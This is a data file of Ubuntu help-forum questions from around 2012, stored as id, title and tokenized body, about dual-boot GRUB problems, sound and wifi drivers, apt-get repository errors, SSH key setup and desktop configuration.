189194	ubuntu 12.04.1 dual boot - boots directly to windows 7	i wanted to install ubuntu on my computer as second os . i shrank the windows partition and gave ubuntu about 40gb of space . after this i created a live usb having ubuntu 12.04.1 , and booted using the usb stick , everything went like it should . having booted to the live ubuntu i started the installation of ubuntu . i allowed the installer to do its magic and install ubuntu side by side with windows 7 . the installation finished without issues , cool . however , when i restarted my computer , windows 7 started loading immediately . this suggests that installation of grub either failed , or it ended up in the wrong place . edit : here is the list of partitions on my hard drive device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1827614719 913703936 7 hpfs/ntfs/exfat /dev/sda3 1827616766 1909534719 40958977 5 extended partition 3 does not start on physical sector boundary . /dev/sda4 1909534720 1953521663 21993472 7 hpfs/ntfs/exfat /dev/sda5 1827616768 1892798463 32590848 83 linux /dev/sda6 1892800512 1909534719 8367104 82 linux swap / solaris how could i get the boot loader sorted out properly ? i assume using the live usb and terminal , but what should i do with it ? thanks
189196	aplay -l says no soundcards found ; alsaconf says no supported cords ; yet /proc/asound contains cards	i am trying to get hdmi output using a gainward nvidia 210 512 mb on ubuntu 10.04 lucid lynx . i have upgraded alsa-driver , alsa-lib and alsa-utils to 1.0.24 by building from source , thanks to this blog post . after i use aplay -l on terminal , it says : user @ box : ~ $ lspci | grep audio 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 01:09.0 multimedia video controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder ( rev 05 ) 01:09.2 multimedia controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ mpeg port ] ( rev 05 ) 01:09.4 multimedia controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ ir port ] ( rev 05 ) 02:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) user @ box : ~ $ cat /proc/asound/version advanced linux sound architecture driver version 1.0.24 . compiled on sep 15 2012 for kernel 2.6.32-42-generic ( smp ) . user @ box : ~ $ ls /proc/asound` card0 cards hwdep nvidia oss seq version card1 devices modules nvidia_1 pcm timers user @ box : ~ $ aplay -l aplay : device_list:240 : no soundcards found ... user @ box : ~ $ sudo /sbin/alsa-utils start * setting up alsa ... * warning : 'alsactl restore ' failed with error message 'alsactl : set_control:1403 : can not write control '2:0:0 : iec958 playback default:0 ' : operation not permitted ' ... amixer : invalid command ! ... done . any help appreciated . ps my video card is connected only through the pci-e slot . i assume there is no extra audio connection required .
189200	getting access to var/www	very , very new user to ubuntu and i 've been searching for a long time without finding an answer . probably i 've gotten the answer but i do n't understand it all that very well so i thought i try this instead . my problem is that i do n't have a permission to the var/www folder that i assume is where my `` localhost '' should be . i do n't know how to change the permission so i can change files and add . nether am i sure if i want to . my intentions are only to be available to view php in my browser . if anyone know how i can change my permissions or how i can view php else way i 'll be very happy . running ubuntu 12.04 . thanks ! p.s . as i said i 'm very new so please take it slow : )
189201	ca n't update ubuntu 12.04 lts-output of sudo apt-get update and upgrade inside	i 'm having ubuntu 12.04 lts and i 'm getting an error while trying to update . if any further information is needed , please tell and i 'll add it . here sudo apt-get update and sudo apt-get upgrade output together one command after the other : itay_rabin @ itayspc : ~ $ sudo apt-get update ign http : //ppa.launchpad.net precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-security inrelease ign http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise release.gpg get:1 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] ign http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise-backports release.gpg hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release hit http : //archive.ubuntu.com precise-security release.gpg hit http : //archive.ubuntu.com precise release ign http : //ppa.launchpad.net precise/main translationindex get:2 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise-backports release hit http : //archive.ubuntu.com precise-security release hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //archive.canonical.com precise/partner translationindex hit http : //archive.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/restricted sources hit http : //archive.ubuntu.com precise/universe sources hit http : //archive.ubuntu.com precise/multiverse sources hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex ign http : //archive.getdeb.net precise-getdeb inrelease hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:3 http : //archive.ubuntu.com precise-updates/main sources [ 164 kb ] err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found get:4 http : //archive.ubuntu.com precise-updates/restricted sources [ 3,285 b ] get:5 http : //archive.ubuntu.com precise-updates/universe sources [ 51.8 kb ] ign http : //ppa.launchpad.net precise/main translation-he_il ign http : //ppa.launchpad.net precise/main translation-he get:6 http : //archive.ubuntu.com precise-updates/multiverse sources [ 4,241 b ] get:7 http : //archive.ubuntu.com precise-updates/main i386 packages [ 388 kb ] ign http : //ppa.launchpad.net precise/main translation-en hit http : //archive.getdeb.net precise-getdeb release.gpg ign http : //archive.canonical.com precise/partner translation-he_il ign http : //extras.ubuntu.com precise/main translation-he_il ign http : //archive.canonical.com precise/partner translation-he ign http : //extras.ubuntu.com precise/main translation-he ign http : //archive.canonical.com precise/partner translation-en ign http : //extras.ubuntu.com precise/main translation-en get:8 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 6,732 b ] get:9 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 131 kb ] hit http : //archive.getdeb.net precise-getdeb release get:10 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 9,672 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-backports/main sources hit http : //archive.ubuntu.com precise-backports/restricted sources hit http : //archive.ubuntu.com precise-backports/universe sources hit http : //archive.ubuntu.com precise-backports/multiverse sources hit http : //archive.ubuntu.com precise-backports/main i386 packages hit http : //archive.ubuntu.com precise-backports/restricted i386 packages hit http : //archive.ubuntu.com precise-backports/universe i386 packages hit http : //archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex hit http : //archive.ubuntu.com precise-security/main sources hit http : //archive.ubuntu.com precise-security/restricted sources hit http : //archive.ubuntu.com precise-security/universe sources hit http : //archive.ubuntu.com precise-security/multiverse sources hit http : //archive.ubuntu.com precise-security/main i386 packages hit http : //archive.ubuntu.com precise-security/restricted i386 packages hit http : //archive.ubuntu.com precise-security/universe i386 packages hit http : //archive.ubuntu.com precise-security/multiverse i386 packages hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-he hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-he hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-he hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-he hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-he hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-he hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en hit http : //archive.getdeb.net precise-getdeb/games sources hit http : //archive.getdeb.net precise-getdeb/games i386 packages ign http : //archive.getdeb.net precise-getdeb/games translationindex ign http : //archive.getdeb.net precise-getdeb/games translation-he_il ign http : //archive.getdeb.net precise-getdeb/games translation-he ign http : //archive.getdeb.net precise-getdeb/games translation-en fetched 808 kb in 13s ( 58.2 kb/s ) w : כשלון בהבאת http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : כשלון בהבאת http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . itay_rabin @ itayspc : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . itay_rabin @ itayspc : ~ $ thanks for your assitance . edit-output of update in english : [ sudo ] password for itay_rabin : ign http : //ppa.launchpad.net precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease ign http : //archive.ubuntu.com precise-security inrelease ign http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise release.gpg get:1 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //archive.ubuntu.com precise release.gpg ign http : //ppa.launchpad.net precise release hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release hit http : //archive.ubuntu.com precise-updates release.gpg get:2 http : //archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //archive.ubuntu.com precise-security release.gpg hit http : //archive.ubuntu.com precise release hit http : //archive.ubuntu.com precise-updates release ign http : //ppa.launchpad.net precise/main translationindex get:3 http : //archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise/main sources ign http : //archive.canonical.com precise/partner translationindex hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise-security release hit http : //archive.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/restricted sources hit http : //archive.ubuntu.com precise/universe sources ign http : //archive.getdeb.net precise-getdeb inrelease hit http : //archive.ubuntu.com precise/multiverse sources hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/main sources hit http : //archive.ubuntu.com precise-updates/restricted sources hit http : //archive.ubuntu.com precise-updates/universe sources hit http : //archive.ubuntu.com precise-updates/multiverse sources err http : //ppa.launchpad.net precise/main sources 404 not found hit http : //archive.ubuntu.com precise-updates/main i386 packages hit http : //archive.ubuntu.com precise-updates/restricted i386 packages hit http : //archive.ubuntu.com precise-updates/universe i386 packages hit http : //archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex err http : //ppa.launchpad.net precise/main i386 packages 404 not found get:4 http : //archive.ubuntu.com precise-backports/main sources [ 2422 b ] get:5 http : //archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:6 http : //archive.ubuntu.com precise-backports/universe sources [ 14.5 kb ] get:7 http : //archive.ubuntu.com precise-backports/multiverse sources [ 2240 b ] get:8 http : //archive.ubuntu.com precise-backports/main i386 packages [ 1941 b ] get:9 http : //archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:10 http : //archive.ubuntu.com precise-backports/universe i386 packages [ 13.0 kb ] ign http : //archive.canonical.com precise/partner translation-en ign http : //ppa.launchpad.net precise/main translation-en get:11 http : //archive.ubuntu.com precise-backports/multiverse i386 packages [ 1897 b ] get:12 http : //archive.ubuntu.com precise-backports/main translationindex [ 72 b ] get:13 http : //archive.ubuntu.com precise-backports/multiverse translationindex [ 72 b ] get:14 http : //archive.ubuntu.com precise-backports/restricted translationindex [ 70 b ] get:15 http : //archive.ubuntu.com precise-backports/universe translationindex [ 72 b ] ign http : //archive.canonical.com precise/partner translation-he ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-he hit http : //archive.ubuntu.com precise-security/main sources hit http : //archive.ubuntu.com precise-security/restricted sources hit http : //archive.ubuntu.com precise-security/universe sources hit http : //archive.ubuntu.com precise-security/multiverse sources hit http : //archive.ubuntu.com precise-security/main i386 packages hit http : //archive.ubuntu.com precise-security/restricted i386 packages hit http : //archive.ubuntu.com precise-security/universe i386 packages hit http : //archive.ubuntu.com precise-security/multiverse i386 packages hit http : //archive.ubuntu.com precise-security/main translationindex ign http : //extras.ubuntu.com precise/main translation-he hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/multiverse translation-he hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/restricted translation-he hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise/universe translation-he hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-he hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-he hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-he hit http : //archive.ubuntu.com precise-backports/main translation-en get:16 http : //archive.ubuntu.com precise-backports/multiverse translation-en [ 1045 b ] hit http : //archive.ubuntu.com precise-backports/restricted translation-en get:17 http : //archive.ubuntu.com precise-backports/universe translation-en [ 9472 b ] hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.getdeb.net precise-getdeb release.gpg hit http : //archive.ubuntu.com precise-security/universe translation-en hit http : //archive.getdeb.net precise-getdeb release hit http : //archive.getdeb.net precise-getdeb/games sources hit http : //archive.getdeb.net precise-getdeb/games i386 packages ign http : //archive.getdeb.net precise-getdeb/games translationindex ign http : //archive.getdeb.net precise-getdeb/games translation-en ign http : //archive.getdeb.net precise-getdeb/games translation-he fetched 96.7 kb in 14s ( 6576 b/s ) w : failed to fetch http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . itay_rabin @ itayspc : ~ $ just uploading :
189205	how to share my wifi internet to other system ?	i 'm using ubuntu 12.04 , and i have an internet connection through my wireless card . i want to share this internet connection so that other systems ( like an android phone for example ) can use internet through my ubuntu pc .
189206	keeping the time stamp when syncing with ubuntu one ?	i would like to keep the original time stamp of a file when synchronizing with ubuntu one . now ubuntu one is messing with my time stamps , and i no longer know when i last worked on the file . ubuntu one also seem to mess up time stamps on the original source host . this really is a show stopper , and we are just about to implement ubuntu one across the many users in the organization .
189208	cpu frequency is off	i 'm working on overclocking my rig right now , but i need to know the cpu frequency from within ubuntu . i 've figured out that i have to run a stress test while preforming the following commands to get a `` accurate '' reading , but they still only record stock speed . i 've tried sudo cat /proc/cpuinfo but that shows my cpu cores running at 800mhz . i 've looked in system information but both report my cores running at 2900.00mhz , when the bios reports my poor overclocking skills coming in at roughly 3100.00mhz . after a reboot and overclocking my cpu another 200mhz , both tools now report 3200.0mhz when my bios says its just above 3400.00mhz . the tools do n't report the stock speed , but i doubt they 're reporting the real speed , they 're about 200mhz low . what am i doing wrong , why are these tools only reporting my stock settings ?
189210	how do i install ubuntu on a sony vaio svt1311 ?	i am wondering if i could get assistance of how to install ubuntu on my sony vaio t. svt131a11l is the hardware configuration code and the model number of the computer is one among the svt1311 series . i contacted sony customer service but their answer was to contact a linux representative . the bugging error with vaio devices is they are build to run windows and it doesnt come configured with a dual boot option , i am wondering if i could get any assistance of how to solve it , or where i could get related information .
189215	dual monitor setup with intel graphics and nvidia geforce gt 425m on 12.04	i have a dell xps l401x and just installed 12.04 . i have a mini-display and an hdmi output , and i could hook up two dell ultrasharp monitors to each port on windows 7 , and get a triple monitor setup . doing a bit of research , it seems like the mini-display is wired to the integrated graphics card whereas hdmi is hooked up to nvidia graphics card . i 've also installed bumblebee as it seemed like that was the proper way of installing nvidia drivers on ubuntu . at the moment none of my monitors is being recognized by ubuntu . is it even possible to have a triple monitor ( laptop display + 2 external ) setup ? has anyone successfully done this ?
189220	why are some apps incompatible with 12.10 ?	i recently found out about the appaptoncd and became hugely excited ! it could take the packages of my choice in my precise desktop and pack them all in one cd , like my `` essentials '' installation media . i installed this app and placed my favorite packages into a cd . next , i wanted to insert the cd on my laptop running ubuntu quantal daily build . i navigated to the aptoncd page on the software center , and to my dismay , i realized that it was incompatible with quantal . why can some apps , like this one , be incompatible in quantal ? thanks .
189221	error message using telnet	i am installing postfix . i configured the main.cf with the local ip 127.0.0.1 . i created a contact @ localhost.fr in my bdd ( phpmyadmin ) . but when i send an email using telnet , i put : rcpt to : and i have a message error `` temporary lookup failure '' . so the mail is not sent , what does this message mean exactly ?
189223	wireless disabled even though the direct connectin ( thru modem ) is working fine	need help with my newly installed ubuntu 12.04 system ( dual booting along with win 7 ) , even thoguh i can use internet using the modem and directly plugging it , the wireless network is disabled and it says firmware missing . i tried the following options : checking to see if the wireless is disabled using the hot keys ( f2 or ctrl+f2 , fn+f2 keys ) , the wireless is working fine in win 7 but not in ubuntu . i am able directly plug the laptop with the modem and able connect to internet using ubuntu . from the top right hand menu bar , te wireless networks options say `` device not ready ( firmware missing ) and the enable wireless checkbox is checked . tried the command rfkill list , it shows all are not blocked . 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 bluetooth soft blocked : no hard blocked : no ifconfig command shows eth0 and lo ( lcoalhost ) up and running but the wlan0 option is not available to show unless i type ifconfig -a , when it shows wlan0 but its down . the command lspci -vvnn | grep 14e4 shows 04:00.0 network controller [ 0280 ] : broadcom corp bcm4312 802.11b/g lp-phy [ 14e4:4315 ] { rev 01 ) 08:00.0 ethernet controller [ 0200 ] : broadcom corp netlink bcm5784m gigabit ethernet pcie [ 1434:1698 ] { rev 10 ) the file /var/lib/networkmanager/networkmanager.state shows all options are true ( networking enabled , wireless enabled , wwlanenabled and wimaxenabled all options are set to true ) . 8 ) 'additional drivers ' in your dash and/or preferences do not bring up anything at all . 9 ) output for lshw -c network shows *-network disabled description : wireless interface physical id : 4 logical name : wlan0 serial : 78 : e4_00 '' 43 : b6 : ab capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.2.0.29-generic-pae firmware=n/a link=no multicast= yes wireless=ieee 802.11bg
189229	ubuntu 10.04 to 12.04 problem	hey , i just updated from ubuntu 10.04 to 12.04 from update manager , and now when i start it up it says : failed to create pyt - disabling logging for job . i have no idea what to do . please help . i 'm not a computer geek , so please make instructions easy .
189231	where are the stock-icon-names defined for the unity-panel-service indicators and notify-osd ?	layout cases in the notification | ubuntu app developer document states that ... using non-existing ( stock- ) icon-names ... use one of the new icon-name ( see icons ) ... and that this ( icons at http : //wiki.ubuntu.com/mhall119/devportal/notify-osd # icons ) only makes casual reference , via the examples , to ... -i notification-message-im ... -i notification-network-wireless-disconnected presumably ... -i notification-network-wireless-connected is also one ? confirmed via : ( interesting icon ) notify-send `` wifi icon test '' -i notification-network-wireless-connected what other ones are there ? ( note that the icons link in the source : wiki.ubuntu.com/mhall119/devportal/notidy-osd # icons incorrectly spells notify as notidy ) as a consequent of the implications of this answer : where are the stock-icon-names defined for the unity-panel-service indicators and notify-osd ? the icons in the above examples could then be found here : - file : ///usr/share/notify-osd/icons/gnome/scalable/status/ - file : ///usr/share/notify-osd/icons/hicolor/scalable/status/ however , while there was no icon file named notification-network-wireless-connected that string displays notification-network-wireles.svg as does notification-network-wireless-gobledeegook ! bookmark : where are the stock-icon-names defined for the unity-panel-service indicators and notify-osd ?
189235	music player with auto library refresh ?	is there any music player with the ability to auto-refresh it 's contents , when a song is added in it 's library directory manually ? like , if i add a song on my itunes library on my mac os partition , then the ubuntu player i 'm searching for ( which will also has the same directory as a library folder ) will automatically have the song that has been added in the player ...
189240	moving /boot to a separate partition	i 've installed ubuntu 12.04 on a partition with btrfs as its file system , but it appears that grub2 seems to have some issues with that file system . for some reason it takes it very long time to boot and it does n't display os-selection screen at all . so i decided to move my /boot to a separate partition with ext2 file system . but i do n't know what steps exactly should i take to do it . please , help ! : )
189242	click and drag/multi-touch not working 12.04	i just installed 12.04 on my new laptop , asus k55a , and the click and drag is not really working . it will let me double tap and drag , but i can not use the trackpad to click and then drag it around . two-finger scrolling does not work either . i would assume that it has something to do with multitouch on the trackpad , as anything requiring it is not responding correctly . it is usable at the moment but just really annoying , is there a way to fix this ?
189243	trouble setting up open ssh with putty	i for the life of me ca n't seem to get openssh to work on ubuntu server 10.10 with keys i generated in puttygen on my windows machine . after hours of trial and error and web searches i ca n't get my ssh service to accept my private key ! here is my sshd_config . i generated my public and private keys using putty in windows then used a ssh connection to paste my key from putty directly into my authorized_keys2 file located in */etc/ssh/publickeys/authorized_keys2* the authorized_keys2 file looks something like : ssh-rsa aaaab3nzac1yc2eaaaa ... with no email or anything at the end of it . i just pasted it straight from puttygen without using a key comment . i feel like it 's not working because of some nuance i am not understanding or some unusual setting or incompatibility . i 've restarted the ssh service ( and the machine ) to no avail . what are some common pitfalls i might have gotten myself into ? is there a simpler way to generate ssh keys that putty can use in windows ?
189244	sound not working on reboot	i have a alienware m17xr4 and when i reboot from windows 7 into 12.04 i have no sound . the icon is there and all of the listed devices are still present just no sound . if i reboot in 12.04 back into 12.04 it stops working . if i reboot from 12.04 to windows 7 the sound works fine in windows . the only way to fix the problem with the sound in 12.04 in to shut the computer down for 15 seconds then start it again .
189245	how to submit binaries to the armel repository ?	i often find myself compiling binaries for my tablet , since it 's running the arm version of ubuntu precise and there is not a lot of newer software available for it . as an example , gimp 2.8 took like half a day to compile but now that i 've got it , i 'd like to make it available for everyone else .
189246	how set my monitor resolution ?	i have installed ubuntu on my desktop , but my monitor do n't pass more than 800x600 resolution . my monitor is good at 1360x768 . how can i set resolution at 1380x768 ?
189247	how can i stop nautilus from caching thumbnails ?	in nautilus , i want to see thumbnails on the fly , but i do n't want them to be cached . any way to do this ?
189249	not able to connect to wifi router ; until i reinstall the driver every time i reboot the system , why ?	i am having an issue with connecting to my wifi router since yesterday ; could see the router in the wireless networks available but the router is n't authenticating my password . unblocking the hardware switches does n't help as non is blocked . every time i reboot my system i am facing the same issue i.e i am unable to connect to the wifi . re-installing the driver from the `` additional driver '' does help but only for that session only . i am not sure why is this happening ; though i recently upgraded to kernel 3.2.0.30 and installed everpad through a ppa . edit : i have to reinstall the driver everytime i boot up my system . these are tail logs from /var/log/jockey.log : - dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-30-generic 2012-09-16 16:43:33,224 debug : unbind/rebind on driver /sys/module/wl/drivers/pci : wl : device 0000:02:00.0 2012-09-16 16:43:33,602 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:33,782 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:33,813 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-09-16 16:43:33,813 debug : fglrx_updates is not the alternative in use 2012-09-16 16:43:33,913 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:34,080 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:34,106 debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-09-16 16:43:34,106 debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking 2012-09-16 16:43:34,285 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:34,449 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:34,488 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-09-16 16:43:34,488 debug : fglrx_updates is not the alternative in use 2012-09-16 16:43:34,601 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:43:34,792 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-09-16 16:48:03,394 debug : shutting down please help me with the issue .
189252	stop terminal from closing automatically when a shell script is run	whenever i try to run a shell script ( with syntax errors ) in the terminal on ubuntu 12.04 , the terminal opens and then quickly closes , so that i ca n't even see the command-line output . is it possible to stop the terminal window from closing in this case ?
189254	pen drive is recognizing as a usb internet dongle which connects to the pc . how do the pen drive configure well in ubuntu 12.04 ?	every time i connect my pen drive it recognizes as more like a dongle . the reason that i 'm telling that if i connect it to the pc when i 'm on the internet , it will automatically copy all the files which are in the dongle . so , i ca n't recognize which one is the pen drive when i want to safely remove the device . i 'm not sure whether it is the pen drive or the dongle.. ? can anyone give me a good advice how to solve this problem ?
189255	will the driver support for intel hd graphics be improved in 12.10 ?	i recently installed ubuntu 12.04 on a hp pavilion dv4 laptop . this is a core i7 machine with intel hd graphics and also a separate nvidia vga card . i had a lot of issues getting ubuntu 12.04 working on this system . first there were issues booting up the live cd for installation . i worked around that by using the 'nomodeset ' option . then i continued to have similar issues after installation has completed . so i had to permanently add the nomodeset option to my grub boot configuration . at the moment i have a working installation but there are many issues : ubuntu gui is a bit flaky at times . the mouse pointer goes on and off when hovering over certain icons . certain things does n't get rendered properly on the screen . i ca n't access any of the tty consoles . hitting ctrl+alt+f [ 1-6 ] gives me a blank screen . and once that happens i ca n't even come back to the ui by hitting ctrl+alt+f7 . i 've realized that tty consoles are actually working . i just ca n't see the text . if i enter a command like 'sudo reboot ' into the empty screen the machine reboots . ca n't get external displays ( monitors , projectors etc ) working . but i think this is probably because the vga out is wired to the nvidia card which is not being used by linux . colord program crashes every now and then triggering a popup message . so my main question is , will the support for intel hd graphics be improved in the next release ? or will i have to keep using the nomodeset option in the new release too ? also i appreciate if anybody can shed some light on any of the issues listed above . thanks in advance .
189263	is it possible to create a shortcut/symbolic link to a folder in unity launcher ?	i want to create a shortcut for a folder on unity . how is it possible ? edit : - i would think of this shortcut as quick-link in windows for referencing a frequently used item easily without having to navigate the directory structure every time i need to access it .
189265	how do i edit the list of music library locations in rhythmbox ?	i previously set rhythmbox to include a few different locations . now following changes to my directory structure , i 'd like to reflect these changes in rhythmbox . but when i go to `` library location '' , i see `` multiple locations set '' and i can only add to the list ; no way to edit/remove . i googled this problem and the only relevant results i get date back to 2006 , probably referring to a previous version of rhythmbox and specifying components/locations that i ca n't find on my system . give a look at the documentation ... kind of minimal . any clues ? ubuntu 12.04 rhythmbox 2.96
